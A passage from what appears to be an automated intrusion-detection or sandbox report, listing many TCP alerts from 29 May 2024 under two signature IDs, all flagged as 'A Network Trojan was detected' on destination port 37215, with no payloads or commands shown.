                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.721102
                SID:2829579
                Source Port:41500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.841487
                SID:2835222
                Source Port:40986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.465925
                SID:2835222
                Source Port:46762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.726102
                SID:2829579
                Source Port:37754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.434870
                SID:2835222
                Source Port:42642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.977755
                SID:2835222
                Source Port:59174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.896628
                SID:2829579
                Source Port:58844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.900341
                SID:2835222
                Source Port:58284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.820481
                SID:2835222
                Source Port:49090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.526914
                SID:2829579
                Source Port:53510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.717280
                SID:2829579
                Source Port:39450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.010894
                SID:2835222
                Source Port:55900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.475034
                SID:2835222
                Source Port:53050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.358739
                SID:2835222
                Source Port:44616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.461811
                SID:2829579
                Source Port:47546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766931
                SID:2829579
                Source Port:56260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.776370
                SID:2835222
                Source Port:42176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.292896
                SID:2829579
                Source Port:40380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.688838
                SID:2829579
                Source Port:53634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.965414
                SID:2835222
                Source Port:50242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.326174
                SID:2835222
                Source Port:57386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.417601
                SID:2835222
                Source Port:46104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.222773
                SID:2835222
                Source Port:45964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617180
                SID:2829579
                Source Port:48374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.717238
                SID:2829579
                Source Port:44612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.770806
                SID:2829579
                Source Port:46572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.072426
                SID:2835222
                Source Port:54904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.217746
                SID:2835222
                Source Port:52318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.226616
                SID:2835222
                Source Port:37826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.858851
                SID:2829579
                Source Port:57406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597972
                SID:2829579
                Source Port:59544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.419686
                SID:2835222
                Source Port:57428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782999
                SID:2835222
                Source Port:57254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.570655
                SID:2835222
                Source Port:52664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.714585
                SID:2829579
                Source Port:56018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.745241
                SID:2835222
                Source Port:53872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784058
                SID:2835222
                Source Port:54220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.654760
                SID:2829579
                Source Port:57950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.896948
                SID:2835222
                Source Port:45412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.989117
                SID:2835222
                Source Port:41170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.315879
                SID:2829579
                Source Port:44134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.169612
                SID:2829579
                Source Port:58422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.979734
                SID:2835222
                Source Port:47470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716446
                SID:2829579
                Source Port:52162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597388
                SID:2835222
                Source Port:43328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042460
                SID:2829579
                Source Port:59080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.860156
                SID:2829579
                Source Port:54668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.224661
                SID:2835222
                Source Port:59210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.360458
                SID:2829579
                Source Port:40286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.100892
                SID:2829579
                Source Port:36478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.222940
                SID:2829579
                Source Port:52754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.384498
                SID:2835222
                Source Port:34532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.814819
                SID:2835222
                Source Port:52030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.835893
                SID:2829579
                Source Port:51376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.077550
                SID:2835222
                Source Port:46966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.461945
                SID:2835222
                Source Port:51800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212299
                SID:2835222
                Source Port:49194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.856745
                SID:2835222
                Source Port:42874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652900
                SID:2829579
                Source Port:48570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.816568
                SID:2835222
                Source Port:34050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.461846
                SID:2829579
                Source Port:47248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.287427
                SID:2835222
                Source Port:37050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.288492
                SID:2829579
                Source Port:48302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042728
                SID:2835222
                Source Port:44440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223153
                SID:2829579
                Source Port:43826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.946800
                SID:2835222
                Source Port:43568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.137052
                SID:2829579
                Source Port:54106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.659771
                SID:2835222
                Source Port:51782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.326126
                SID:2835222
                Source Port:60770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.787312
                SID:2835222
                Source Port:45324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.097526
                SID:2829579
                Source Port:34360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.555136
                SID:2835222
                Source Port:51740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.100968
                SID:2835222
                Source Port:53108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675325
                SID:2835222
                Source Port:51712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.796192
                SID:2835222
                Source Port:47204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025765
                SID:2829579
                Source Port:51000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.511184
                SID:2829579
                Source Port:46514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.108873
                SID:2835222
                Source Port:48590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.386162
                SID:2829579
                Source Port:35082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.512062
                SID:2835222
                Source Port:45686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.720152
                SID:2835222
                Source Port:50102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.275898
                SID:2829579
                Source Port:42074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.437141
                SID:2835222
                Source Port:60124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.463570
                SID:2835222
                Source Port:37066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.862095
                SID:2829579
                Source Port:53182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.885863
                SID:2829579
                Source Port:47364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716169
                SID:2829579
                Source Port:34276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.448601
                SID:2829579
                Source Port:34806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.289167
                SID:2835222
                Source Port:57560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.897365
                SID:2835222
                Source Port:47182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.703431
                SID:2835222
                Source Port:36676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.724227
                SID:2829579
                Source Port:56862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.934906
                SID:2835222
                Source Port:41264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.161092
                SID:2835222
                Source Port:54714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.555708
                SID:2835222
                Source Port:47074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.958560
                SID:2835222
                Source Port:57330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.226726
                SID:2835222
                Source Port:34506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.738405
                SID:2835222
                Source Port:54246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.102999
                SID:2835222
                Source Port:33782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.783841
                SID:2835222
                Source Port:40442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.587178
                SID:2829579
                Source Port:44900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.583967
                SID:2835222
                Source Port:47424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.588773
                SID:2835222
                Source Port:34546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.654685
                SID:2835222
                Source Port:59080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.715283
                SID:2829579
                Source Port:60052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.969604
                SID:2835222
                Source Port:47296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.207577
                SID:2835222
                Source Port:33230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784530
                SID:2829579
                Source Port:56740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.608896
                SID:2835222
                Source Port:45892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.721998
                SID:2829579
                Source Port:43746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335902
                SID:2835222
                Source Port:36186
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.815105
                SID:2835222
                Source Port:32788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652768
                SID:2835222
                Source Port:47068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.810372
                SID:2829579
                Source Port:51724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655038
                SID:2835222
                Source Port:57870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.945746
                SID:2835222
                Source Port:48918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023543
                SID:2829579
                Source Port:48818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663237
                SID:2829579
                Source Port:42848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175499
                SID:2835222
                Source Port:58786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.041263
                SID:2835222
                Source Port:49612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.224322
                SID:2835222
                Source Port:47946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385816
                SID:2829579
                Source Port:43570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.180548
                SID:2835222
                Source Port:51194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.857306
                SID:2829579
                Source Port:51002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.180541
                SID:2835222
                Source Port:60100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.537584
                SID:2829579
                Source Port:34738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.824245
                SID:2829579
                Source Port:52542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.820944
                SID:2835222
                Source Port:57856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.059955
                SID:2835222
                Source Port:57052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.958237
                SID:2829579
                Source Port:60604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266286
                SID:2829579
                Source Port:34118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.002084
                SID:2829579
                Source Port:42510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.893792
                SID:2835222
                Source Port:54100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.651643
                SID:2835222
                Source Port:44368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.836308
                SID:2829579
                Source Port:34508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.463017
                SID:2835222
                Source Port:53708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.833652
                SID:2835222
                Source Port:57976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335453
                SID:2835222
                Source Port:40628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.239332
                SID:2835222
                Source Port:33320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.571526
                SID:2835222
                Source Port:55308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612067
                SID:2829579
                Source Port:57144
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.265186
                SID:2835222
                Source Port:59656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.836653
                SID:2829579
                Source Port:48578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.550688
                SID:2829579
                Source Port:54998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.733088
                SID:2835222
                Source Port:43014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583224
                SID:2829579
                Source Port:58306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.339730
                SID:2835222
                Source Port:48542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362484
                SID:2835222
                Source Port:60782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.645625
                SID:2829579
                Source Port:58170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.983786
                SID:2835222
                Source Port:40634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.243598
                SID:2835222
                Source Port:51514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.026323
                SID:2835222
                Source Port:47092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.701149
                SID:2829579
                Source Port:55940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.111185
                SID:2835222
                Source Port:55036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559329
                SID:2829579
                Source Port:48448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.013188
                SID:2835222
                Source Port:46372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.900357
                SID:2829579
                Source Port:49120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.322904
                SID:2835222
                Source Port:50986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.906692
                SID:2829579
                Source Port:45302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.547380
                SID:2835222
                Source Port:59622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135341
                SID:2829579
                Source Port:40814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.833671
                SID:2835222
                Source Port:48972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.915167
                SID:2829579
                Source Port:38272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421040
                SID:2835222
                Source Port:45858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.028021
                SID:2829579
                Source Port:43318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.963053
                SID:2835222
                Source Port:53758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321859
                SID:2835222
                Source Port:55674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.712844
                SID:2835222
                Source Port:58020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.262595
                SID:2835222
                Source Port:33908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.763611
                SID:2829579
                Source Port:56344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519214
                SID:2835222
                Source Port:52522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897399
                SID:2829579
                Source Port:57786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.169283
                SID:2829579
                Source Port:41354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583428
                SID:2835222
                Source Port:42772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.933223
                SID:2835222
                Source Port:40162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.897691
                SID:2829579
                Source Port:47860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.026616
                SID:2835222
                Source Port:56216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.215748
                SID:2835222
                Source Port:33934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.555719
                SID:2835222
                Source Port:45146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.931051
                SID:2829579
                Source Port:43880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.931900
                SID:2829579
                Source Port:33648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.034120
                SID:2835222
                Source Port:41282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.809225
                SID:2829579
                Source Port:53690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141249
                SID:2835222
                Source Port:37764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.225290
                SID:2829579
                Source Port:39298
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.821378
                SID:2829579
                Source Port:39086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.948386
                SID:2829579
                Source Port:46400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.558549
                SID:2835222
                Source Port:51032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.666410
                SID:2835222
                Source Port:47720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.180125
                SID:2835222
                Source Port:56650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.967308
                SID:2829579
                Source Port:33276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231008
                SID:2829579
                Source Port:43690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.030357
                SID:2835222
                Source Port:55990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.523817
                SID:2829579
                Source Port:54838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.965826
                SID:2829579
                Source Port:34312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.781376
                SID:2835222
                Source Port:44278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025567
                SID:2829579
                Source Port:51394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
